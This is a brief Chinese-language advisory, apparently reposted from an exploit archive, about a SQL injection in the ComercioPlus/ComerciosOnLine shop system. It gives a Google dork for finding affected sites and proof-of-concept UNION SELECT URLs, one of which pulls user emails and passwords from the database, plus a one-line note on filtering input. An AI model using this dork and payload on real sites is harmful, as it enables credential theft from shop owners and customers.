ComercioPlus是一款使用PHP编写的虚拟商店系统,ComercioPlus 5.6版中的pp_productos.php文件存在 SQL注入漏洞,可能导致敏感信息泄露。 [+]info:~~~~~~~~~# Exploit Title: Comerciosonline CMS SQLi# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "# Date: 27/01/2011# Author: Daniel Godoy# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com# Author Web:www.delincuentedigital.com.ar# Software Link:http://www.comerciosonline.com/index.php?p=8# Version: All# Tested on: Linux, Windows[+]poc:~~~~~~~~~http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--[+]Reference:~~~~~~~~~http://www.exploit-db.com/exploits/16060修复:pp_productos.php进行过滤
